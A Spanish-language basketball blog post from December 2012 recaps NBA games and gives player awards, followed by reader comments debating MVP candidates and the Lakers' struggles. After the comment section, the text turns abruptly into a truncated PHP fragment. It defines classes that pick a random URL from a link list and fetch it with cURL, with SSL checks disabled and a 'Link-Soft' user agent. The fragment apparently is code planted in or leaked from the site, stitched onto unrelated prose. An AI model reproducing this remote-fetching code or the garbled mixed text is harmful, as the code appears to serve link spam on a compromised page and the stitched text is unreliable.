La Crónica: Melodía de seducción

12 de December de 2012 por TheDeerHunter

Segundo derbi neoyorquino y segunda victoria venganza de los Knicks. Carmelo Anthony batía su mejor marca este curso con 45 puntos con buenos porcentajes y 5 de 7 en triples. A estos se sumaron el 6 de 8 de Kidd, incluído uno antológico para marcar la ventaja definitiva, y el 2 de 2 de Rasheed Wallace y, a pesar del 0 de 4 que anoche aportó JR, los Knicks volvieron a resultar demoledores desde la larga distancia (14 de 28 en total). En contraposición los Nets lo hicieron todo bien menos eso. Partido serio del quinteto titular superando la baja de Brook Lopez y la caída en desgracia de Humphries (bien empleados los 12 kilakos/año). La pareja Evans-Blatche se complementó a la perfección. Deron, Wallace y Joe Johnson también aportaron, pero con semejante desacierto desde más allá del arco la distancia de 3 abajo a falta de menos de 10 segundos resultó finalmente insalvable (100-97).

Los Lakers suman y siguen, pero además les crecen los enanos. Volvía Irving anoche y Duhon soñará con él una buena temporada. Kobe anotó 42… que esta temporada es sinónimo de derrota. De hecho los amarillos suman un terrorífico 1 de 10 cuando él ha anotado más de 30 este año. A D’Antoni se le van acabando las ideas. Anoche probó con Jordan Hill de titular y este respondió con uno de sus peores actuaciones del curso, anulándose con Tristan Thompson. Jamison va a días y anoche el banco fue otro solar. También lo fue el de los Cavs, pero CJ Miles explotó con 28 puntos y Varejao y Gee aportaron el trabajo habitual (94-100).

Por su parte los vecinos pobres lograron la 7ª victoria consecutiva en la incómoda cancha de Chicago. Intenso y emocionante duelo, destacando el individual Griffin vs Boozer que terminó esencialmente en tablas. Destacable actuación de Belinelli en modo “tirarse hasta las zapatas”, sin embargo la balanza la inclinó el banco de los Clippers con una buena actuación de Barnes y Crawford (94-89).

Para terminar los Nuggets tuvieron que remontar en Detroit (101-94), destacando Lawson y el banco, y los Wizards se llevaron un feo duelo con los Hornets (77-70). 

PREMIOS

MVP: No vamos a descubrir nada diciendo que Carmelo Anthony está en modo MVP. Ayer lo volvió a demostrar con 45 puntos de todos los colores, 5 rebotes y  3 asistencias. Kyrie Irving volvió a lo grande con 28 puntos, 6 rebotes, 11 asistencias y victoria.

Rookie: Poco a poco saca la cabeza Bradley Beal. Con 15 puntos, 7 rebotes y 4 asistencias mantuvo a su equipo con vida hasta el arreón del último cuarto. En el mismo partido Anthony Davis volvía de su lesión y aportó 13 puntos y 8 rebotes.

Sorpresa: Irving, Varejao y… Cj Miles. El escolta de los Cavs fue pieza clave en la victoria de su equipo frente los Lakers con 28 puntos y 5 rebotes.

Decepción: Cada derrota de los Lakers es una decepción en toda regla. Ayer solo Kobe, Howard y Metta World Peace dieron la cara, el resto ni se presentó a jugar… Marco Bellinelli acabó el partido con 18 puntos pero un 6 de 22 en tiros de campo.

Esfuerzo en vano: 42 puntos de Kobe Bryant y 20 rebotes de Dwight Howard pero los Lakers volvieron a caer. Carlos Boozer tuvo uno de sus partidos buenos (24-13) pero ni fue suficiente para vencer a los Clippers.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. Denise dice:
    #1

    Que bien los Clippers, yo ya les di contenders al anillo, y están jugando muy bien, la plantilla es superprofunda, Griffin parece haber dado un paso adelante, Crawford postulandose como el mejor 6º hombre, Bledsoe sintiendose comodo en su rol, y Barnes aportando en todo, genial jugador de lo mas infravalorado en la liga en la ultima decada. Y todavía confío en que Odom se motive, Billups vuelva bien, y Grant Hill termine con el lastre de las lesiones. Para mí, a dia de hoy, el equipo más profundo de la NBA, con 13 tios aptos para jugar más de 30 minutos si la situación lo requiere. En ese aspecto, me recuerdan a los Magic del 2009 y 2010.

    Lo malo es no haber apostado mas fuerte por Howard, visto lo visto por los managers de Magic, habrían aceptado por Superman a De Andre, Mo Williams, Foye o alguna ronda. ¿habría alguna posibilidad de que Howard no renovase por Lakers y fuera a Clippers?

      Citar

  2. elreylagarto dice:
    #2

    Hoy mismo publica Marca que Kutchap dice que no van a traspasar este año a Gasol (http://www.marca.com/2012/12/12/baloncesto/nba/noticias/1355295719.html)…pero creer a Marca es como creer en cualquier en el final del mundo predicho por los Mayas (por cierto, hoy mismo).

      Citar

  3. Denise dice:
    #3

    No era el 22 lo de los mayas, coincidiendo con el solsticio de invierno?…

      Citar

  4. car dice:
    #4

    Donde puedo jugar una liga fantasy en español????????? en que pagina me tengo que registrar???

      Citar

  5. Sancho88 dice:
    #5

    “Marco Bellinelli acabó el partido con 18 puntos pero un 6 de 22 en tiros de campo.”

    Y 7 rebotes, 5 asistencias y 2 robos, que todo hay que decirlo. No sé, el otro día Felton se hizo un partido de 9/30 y nadie le dio palos por aquí. Es normal que si eres escolta tengas que tirar a canasta. Tampoco es un partido tan desastroso viendo que aportó en más aspectos del juego

      Citar

  6. Sancho88 dice:
    #6

    Y lo de Carmelo es brutal. MVP indiscutible hasta la fecha

      Citar

  7. TheDeerHunter dice:
    #7

    Sancho88:
    “Marco Bellinelli acabó el partido con 18 puntos pero un 6 de 22 en tiros de campo.”

    Y 7 rebotes, 5 asistencias y 2 robos, que todo hay que decirlo. No sé, el otro día Felton se hizo un partido de 9/30 y nadie le dio palos por aquí. Es normal que si eres escolta tengas que tirar a canasta. Tampoco es un partido tan desastroso viendo que aportó en más aspectos del juego

    La diferencia es que Felton es titular… y ahora mismo casi te diría segunda espada NY. Belinelli apenas ha jugado, pero vamos… que quitando la carreta de zapatillas no ha hecho mal partido el hombre.

      Citar

  8. Pop dice:
    #8

    Bueno eso de indiscutible… Está haciendo la campaña de su vida, y encima está ayudando a que NY esté por fin en un momento dulce.

    Pero LeBron…buf. Mira que yo le tengo bastante tirria, pero es que no veas. Como nos está acostumbrando ya no nos llevamos las manos a la cabeza, pero lleva una temporada brutal, los Heat van perfectos también. Y encima es que da la sensación de que va con el freno de mano echado. Está con los mejores porcentajes de su vida, reboteando más que nunca y asistiendo como siempre.

    Yo diría que Carmelo le puede discutir el MVP a LeBron, pero no más. Al menos hasta ahora.

      Citar

  9. rumbero dice:
    #9

    El dia 21, pero tranquilos que el Vaticano ya ha dicho que no va a petar nada y estos tienen contacto directo 😀

    De lo mejorcito que ver estos Clippers, estan jugando realmente bien y ahora mismo son candidatos por méritos propios. Desconfiaba un poco de los últimos partidos de Griffin; los Suns son unas madres en defensa y Bargnani lo hizo Hall of Famer sólo en el primer cuarto, pero contra los Bulls ha vuelto a estar realmente bien. Parece que el lo del pasito adelante va en serio. Y de acuerdo con lo Barnes, dentro de esa profundidad de banquillo está aportando siempre aunque se hable más de Crawford o Bledsoe.

      Citar

  10. rumbero dice:
    #10

    Por cierto, si mal no recuerdo mal el primero de los derbis neoyorquinos se lo llevaron los Nets

      Citar

  11. Sancho88 dice:
    #11

    Es filpante que Barnes aún no le haya ganado la tostada como titular a Butler. Flipante

      Citar

  12. Sancho88 dice:
    #12

    Y que quede claro que lo digo porque Barnes se está marcando un temporadón y Butler todo lo contrario. No sé como Del Negro no se da cuenta aún

      Citar

  13. Txusma dice:
    #13

    rumbero:
    Por cierto, si mal no recuerdo mal el primero de los derbis neoyorquinos se lo llevaron los Nets

    Cierto es. Los Nets ganaron el partido postpuesto.

      Citar

  14. Sancho88 dice:
    #14

    Por cierto, lo de Jason Kidd con el reglamento en la mano es técnica a Jason Kidd, no 3+1. El truco de abrir las piernas no está permitido, y se considera simulación. El tiro de Jason no requiere esa posición. Abre las piernas para recibir falta y luego simula. Técnica como una casa

      Citar

  15. Esteban dice:
    #15

    Sancho88:
    Es filpante que Barnes aún no le haya ganado la tostada como titular a Butler. Flipante

    es una cuestion de tactica creo yo,

    barnes le da el vertigo y la adrenalina al banco de los clipers, sumado a jamal y bledsoe, es una banca explosiva

    mientras que butler, saliendo del banco pdoria dar poco y nada y en cambio jugando de titular, raya dos partidos pesimos y uno grandioso,

    a mi me parece bien butler de titular

      Citar

  16. Esteban dice:
    #16

    que placer ver a los clippers en los segundos finales de los juegos cerrados,

    CP3 bota la bola una y otra vez, todos saben que no lanzara de 3, ni que pasara el balon, tampoco llegara en bandeja, se acercara 2 o 3 metrros al aro y lanzara desde alli, y aun asi nadie pueden pararlo, DELICIA

      Citar

  17. melo15 dice:
    #17

    Para mi Melo es con Durant el que se esta mereciendo mas el MVP, por su nivel de juego, compromiso y mejora.
    Lebron es para mi el mejor de la NBA, pero sus Heat van peores en la clasificacion y encima han sido derrotados dos veces por NY. Yo creo que si la temporada acabara asi se lo darian a Durant.

      Citar

  18. Esteban dice:
    #18

    melo15:
    Para mi Melo es con Durant el que se esta mereciendo mas el MVP, por su nivel de juego, compromiso y mejora.
    Lebron es para mi el mejor de la NBA, pero sus Heat van peores en la clasificacion y encima han sido derrotados dos veces por NY. Yo creo que si la temporada acabara asi se lo darian a Durant.

    DURANT fue mi candidato en la porra, y en cuanto sigan ganando de esta manera sera dificil quitarselo, CARMELO con el solo hecho de ser candidato debe estar conforme

      Citar

  19. lost dice:
    #19

    Sancho88:
    Por cierto, lo de Jason Kidd con el reglamento en la mano es técnica a Jason Kidd, no 3+1. El truco de abrir las piernas no está permitido, y se considera simulación. El tiro de Jason no requiere esa posición. Abre las piernas para recibir falta y luego simula. Técnica como una casa

    Ball don’t lie.

      Citar

  20. nba dice:
    #20

    No se a que espera Kupchak para hacer algun cambio mas en la plantilla, porque si pretende esperar a que vuelva Nash y a evaluar el rendimiento despues, se encontrara con que la franquicia estara peleando por no ser el farolillo rojo tras su gira on-the-road.
    Yo no creo que los aficionados olviden que en la pretemporada se perdieron todos los partidos, y todos los jugadores estaban sanos, por lo que hay que empezar ya a escuchar ofertas por Gasol, y dejar de decir lo bueno y cuanto se le quiere en LA, que supongo que sera para que los pretendientes suban sus ofertas, si Pau en enero todavia sigue en Lakers,sera una mala noticia para la franquicia, ya que significara que no pasaremos de primera ronda en playoffs

      Citar

  21. Esteban dice:
    #21

    nba: Yo no creo que los aficionados olviden que en la pretemporada se perdieron todos los partidos, y todos los jugadores estaban sanos, por lo que hay que empezar ya a escuchar ofertas por Gasol, y dejar de decir lo bueno y cuanto se le quiere en LA, que supongo que sera para que los pretendientes suban sus ofertas, si Pau en enero todavia sigue en Lakers,sera una mala noticia para la franquicia, ya que significara que no pasaremos de primera ronda en playoffs

    opino igual y lo dije el otro dia

    ya van 22 juegos para los lakers con un record, 9 y 13, y se sigue pensando que ganran 10 partidos consecutivos y estaran en el top 4 del oeste, en que se basan? pierden con CUALQUIERA, y contra equipos duros enserios son vapuleados como con el thunder

    es cierto que faltan nash y pau, pequeño detalle, pero un equipo con kobe y howard, por si deberia ganar y mucho, a menos que el grupo de apoyo sea realmente malo que es lo que sucede..

    a ver, la vuelta de nash no mejorara en absoluto la defensa y dudo que haga un cambio sustancial en ataque, pues simplemente no tiene muchas opciones de a quien darle el balon, (sin tener en cuenta lo que lo acapara kobe), metta, hill, duhon, meeks o hasta jamison no son opciones verdaderamente confiables para lograr puntos tras un pase magistral de nash,

    mientras que el regreso de gasol, no tiene mucho sentido con D`antoni, solo hara mas lento un equipo que pretende correr… un descalabro como ya ha dicho magic, no tiene sentido que con howard, kobe y metta, grandes defensores, el entreandor se decida a regalar la defensa, y con jugadores lentos como pau y metta y sin tiradores natos, pretenda crrer y tirar

    o d`antoni cambia la tonica, o los lakers se quedan sin PO o se va d`antoni en unos partidos

      Citar

  22. HisRoyalAirness dice:
    #22

    Es que a mí lo de que con D´Antoni hay que correr y entonces Pau no sirve me da la risa…
    Tienes dos interiores posibles Hall Of Fame (sí, Pau también, lleva años diciéndose), a una leyenda como Kobe y a Steve Nash.
    Run & Gun? Pues mira, si no funciona utiliza más a tus interiores. Phil puede imponer el sistema por encima de los jugadores porque 11 anillos le abalan. Eso hay que ganárselo y, sino, juegas de otra forma

      Citar

  23. Sancho88 dice:
    #23

    Hostia, ver a Psicho-T defendiendo al hermanito… coño, me ha recordado a las peleas del colegio en la que pegaban a mi hermano y yo tenía que entrar a defenderle… perdon… snifff, estoooo… que emocionante joder. :d

    No en serio, es de coña, estas cosas solo pasan en Indiana. Ben es una mierda pero juega al basket en la nba. ole por el. y tyler tb es malisimo, pero juega tb.

    luego, el paisano este medio latino, el Miles, llevaba 26 puntos en 13 minutos, lo cual me ha hecho sospechar de que llevaba algo más que puntos en su cuerpo. no se´, hay cosas impresionantes

      Citar

  24. jonnyy dice:
    #24

    Sigue mereciendo Warriors menos victorias de las que lleva ??
    Seguis viendolos como un quiero y no puedo

      Citar

  25. GreenPride dice:
    #25

    Bueno pues creo que es claro que se debe empezar a hablar de Melo como claro candidato a MVP siempre y cuando los Knicks consigan mantener el ritmo de victorias cercano a Heat y Thunder. Personalmente creo que este sí va a a ser el año en que se lo den a Durantula pero Melo ha hecho méritos en este primer cuarto de la temporada como el que más.
    El paritido fue básicamente controlado por los Nets, a ratos muy claramente aprovechando la ventaja física que tenían Deron y JoJo sobre sus pares para sacar tiros y ventajas. Los Knicks vivieron mucho partido de sus triples y por ahí y por la fantástica actuación de Melo acabaron llevándose el partido.
    Destacar la gran aportación que para mí hace Rasheed que con su experiencia aporta muchísimo sobre todo en defensa y saber estar. Veremos si les aguanta la gasolina pero empiezan a tener que ser considerados candidatos a todo estos Knicks.
    Del resto, destacar el nuevo batacazo de los Lakers por supuesto. En ataque medio sobreviven con la calidad de Kobe y demás aportaciones pero en defensa se les nota totalmente faltos de cohesión y espíritu. Es increíble ver como un equipo con 3 grandes defensores individuales como Bryant, Howard y Metta puede defender tan rematadamente mal. Tienen dos opciones, esperar que la vuelta de Nash y Pau de un volantazo de 360º (personalmente lo veo difícil bajo el planteamiento de D’Antoni) o bien provocar un traspaso para intentar sacudir y enderezar el rumbo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>